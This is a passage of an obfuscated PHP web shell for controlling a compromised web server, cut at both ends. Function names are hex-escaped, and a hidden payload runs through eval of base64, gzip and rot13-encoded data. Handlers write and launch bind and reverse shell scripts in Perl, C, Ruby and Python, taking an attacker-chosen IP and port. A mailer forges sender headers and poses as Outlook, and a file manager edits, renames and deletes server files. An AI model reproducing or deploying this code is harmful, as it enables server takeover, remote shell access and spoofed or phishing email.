's', 0xA000 => 'l', 0x8000 => '-', 0x6000 => 'b', 0x4000 => 'd', 0x2000 => 'c', 0x1000 => 'p',]; foreach ($flagTypes as $mask => $type) { if (($perms & $mask) == $mask) { $flag = $type; break; } } $permissions = [00400 => 'r', 00200 => 'w', 00100 => 'x', 00040 => 'r', 00020 => 'w', 00010 => 'x', 00004 => 'r', 00002 => 'w', 00001 => 'x',]; foreach ($permissions as $mask => $permission) { $flag .= ($perms & $mask) ? $permission : '-'; } return $flag; } else { return substr(sprintf('%o', fileperms($file)), -4); } } function goog($item) { $downer = "\x66\x75\x6E\x63\x74\x69\x6F\x6E\x5F\x65\x78\x69\x73\x74\x73"("posix_getpwuid") ? @"\x70\x6f\x73\x69\x78\x5f\x67\x65\x74\x70\x77\x75\x69\x64"("\x66\x69\x6c\x65\x6f\x77\x6e\x65\x72"($item))['name'] : "\x66\x69\x6c\x65\x6f\x77\x6e\x65\x72"($item); $dgrp = "\x66\x75\x6E\x63\x74\x69\x6F\x6E\x5F\x65\x78\x69\x73\x74\x73"("posix_getgrgid") ? @"\x70\x6f\x73\x69\x78\x5f\x67\x65\x74\x70\x77\x75\x69\x64"("\x66\x69\x6c\x65\x67\x72\x6f\x75\x70"($item))['name'] : "\x66\x69\x6c\x65\x67\x72\x6f\x75\x70"($item); return $downer . '/' . $dgrp; } function gtyp($file) { $gtyp = ("\x66\x75\x6E\x63\x74\x69\x6F\x6E\x5F\x65\x78\x69\x73\x74\x73"('mime_content_type')) ? "\x6d\x69\x6d\x65\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x5f\x74\x79\x70\x65"($file) : "\x66\x69\x6c\x65\x74\x79\x70\x65"($file); return $gtyp; } "\x65\x72\x72\x6F\x72\x5F\x72\x65\x70\x6F\x72\x74\x69\x6E\x67"(0); "\x73\x65\x74\x5F\x74\x69\x6D\x65\x5F\x6C\x69\x6D\x69\x74"(0); "\x6F\x62\x5F\x73\x74\x61\x72\x74"(); "\x69\x6E\x69\x5F\x73\x65\x74"('max_execution_time', 0); "\x69\x6E\x69\x5F\x73\x65\x74"('output_buffering', 0); "\x73\x65\x73\x73\x69\x6F\x6E\x5F\x73\x74\x61\x72\x74"(); eval(gzuncompress(base64_decode(str_rot13('rWlqHJSYjmND/FgUXI4Y2mdMVTkHC0wSbrOpc19dPIy7p5H2vJaXAfG/ogcBHCMAFZwqr7y7YmyKDDurHqqxCWsS0sVyJvM4g1bgLxk9BQhQRkGPZNFHNa24Ogjnb2dRnE/uQAmTqaD+KsH1QLYCi9Kf7wSrLse1P15TG89EiTYCl7xyaOyfvcYLTkzJFJSVzAdewJnnIZxm8ckK4DmNfsi0Kh/Sdzd+T70IMghfz5e0xE9yfteBW5AYCK6/RZR4dUwEUtgenJG2Oa3sAhIyGDBjvfFeiiCrXgwZxWpp3jwuSoDk8Mk0ymx3ipoDUOEAtFgISux3uEGOsewo7LLodngub0fFzpjcg/nkVeBIrIrBeDr02ASdO7MFoA0HMp4+TgVUY0UMRJ6GJdrcKo4/t5/E3p4sbwwO9ypjGqOHvtyr2KtNW2ECqACAcQe8i1ecDuwNr5k9N53ghVj=')))); echo '
" . "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ps aux | grep cb') . ""; } if (${"\x5f\x50\x4f\x53\x54"}['type'] == 'pb') { sf('/tmp/pb.pl', $bpp); "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('perl /tmp/pb.pl ' . ${"\x5f\x50\x4f\x53\x54"}['port'] . ' &'); echo "" . "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ps aux | grep pb') . ""; } if (${"\x5f\x50\x4f\x53\x54"}['type'] == 'cbc') { sf('/tmp/cbc.c', $bcc); "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('gcc -o /tmp/cbc /tmp/cbc.c'); "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('/tmp/cbc ' . ${"\x5f\x50\x4f\x53\x54"}['ip'] . ' ' . ${"\x5f\x50\x4f\x53\x54"}['port'] . ' &'); echo "" . "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ps aux | grep cbc') . ""; } if (${"\x5f\x50\x4f\x53\x54"}['type'] == 'pbc') { sf('/tmp/pbc.pl', $bcp); "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('perl /tmp/pbc.pl ' . ${"\x5f\x50\x4f\x53\x54"}['ip'] . ' ' . ${"\x5f\x50\x4f\x53\x54"}['port'] . ' &'); echo "" . "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ps aux | grep pbc') . ""; } if (${"\x5f\x50\x4f\x53\x54"}['type'] == 'rbb') { sf('/tmp/rbb.rb', $rby); "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ruby /tmp/rbb.rb ' . ${"\x5f\x50\x4f\x53\x54"}['port'] . ' &'); echo "" . "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ps aux | grep rbb') . ""; } if (${"\x5f\x50\x4f\x53\x54"}['type'] == 'rbbc') { sf('/tmp/rbbc.rb', $rby); "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ruby /tmp/rbbc.rb ' . ${"\x5f\x50\x4f\x53\x54"}['port'] . ' ' . ${"\x5f\x50\x4f\x53\x54"}['ip'] . ' &'); echo "" . "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ps aux | grep rbbc') . ""; } if (${"\x5f\x50\x4f\x53\x54"}['type'] == 'pyb') { sf('/tmp/pyb.py', $pty); "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('python /tmp/pyb.py ' . ${"\x5f\x50\x4f\x53\x54"}['port'] . ' &'); echo "" . "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ps aux | grep pyb') . ""; } if (${"\x5f\x50\x4f\x53\x54"}['type'] == 'pybc') { sf('/tmp/pybc.py', $pty); "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('python /tmp/pybc.py ' . ${"\x5f\x50\x4f\x53\x54"}['port'] . ' ' . ${"\x5f\x50\x4f\x53\x54"}['ip'] . ' &'); echo "" . "\x73\x68\x65\x6C\x6C\x5F\x65\x78\x65\x63"('ps aux | grep pybc') . ""; } } die(); } if (hlx($tools) == 'mailer') { echo 'Mailer Tools
'; if (isset(${"\x5f\x50\x4f\x53\x54"}['from'])) { $headers = "From: Ophellia <" . ${"\x5f\x50\x4f\x53\x54"}['from'] . ">" . PHP_EOL; $headers .= "Reply-To: Ophellia <" . ${"\x5f\x50\x4f\x53\x54"}['from'] . ">" . PHP_EOL; $headers .= "Return-Path: " . ${"\x5f\x50\x4f\x53\x54"}['from'] . PHP_EOL; $headers .= "X-Mailer: Microsoft Outlook 16.0"; "\x6d\x61\x69\x6c"(${"\x5f\x50\x4f\x53\x54"}['to'], ${"\x5f\x50\x4f\x53\x54"}['subject'], ${"\x5f\x50\x4f\x53\x54"}['message'], $headers); echo "Mail Sent !"; } echo ''; die(); } if (hlx($tools) == 'upload') { echo "
System : " . @"\x70\x68\x70\x5f\x75\x6e\x61\x6d\x65"('a') . " " . ${"\x5f\x53\x45\x52\x56\x45\x52"}['SERVER_SOFTWARE'] . "
User : " . "\x67\x65\x74\x5f\x63\x75\x72\x72\x65\x6e\x74\x5f\x75\x73\x65\x72"() . "
Free Space : $size
Server IP : " . "\x67\x65\x74\x68\x6f\x73\x74\x62\x79\x6e\x61\x6d\x65"(${"\x5f\x53\x45\x52\x56\x45\x52"}['HTTP_HOST']) . "
Client IP : " . ${"\x5f\x53\x45\x52\x56\x45\x52"}['REMOTE_ADDR'] . "
Safe Mode : $Safe
PHP Version : " . @"\x70\x68\x70\x76\x65\x72\x73\x69\x6f\x6e"() . "
Disable Function : $disable_functions"; echo "
'; if (${"\x5f\x50\x4f\x53\x54"}['oldname'] && ${"\x5f\x50\x4f\x53\x54"}['newname']) { if (isset(${"\x5f\x50\x4f\x53\x54"}['oldname'])) { rename(${"\x5f\x50\x4f\x53\x54"}['oldname'], ${"\x5f\x50\x4f\x53\x54"}['newname']); echo 'Rename File Done.'; } if (isset($f) and "\x66\x69\x6c\x65\x6d\x74\x69\x6d\x65"($f)) { $text = "\x68\x74\x6d\x6c\x65\x6e\x74\x69\x74\x69\x65\x73"("\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73"($f)); echo '
'; } else { echo 'Rename File Failed.
'; } } echo '
File Name | Actions | Filesize | Filetype | Permission | Owner / Group | Last Modified |
---|---|---|---|---|---|---|
![]() | ||||||
![]() | / RM / CN | \n- | \n" . gtyp($files) . " | \n" . perms($files) . " | \n" . goog($files) . " | \n" . lasmod($files) . " | \n
![]() | ED / RM / CN | \n" . fsize($files) . " | \n" . gtyp($files) . " | \n" . perms($files) . " | \n" . goog($files) . " | \n" . lasmod($files) . " | \n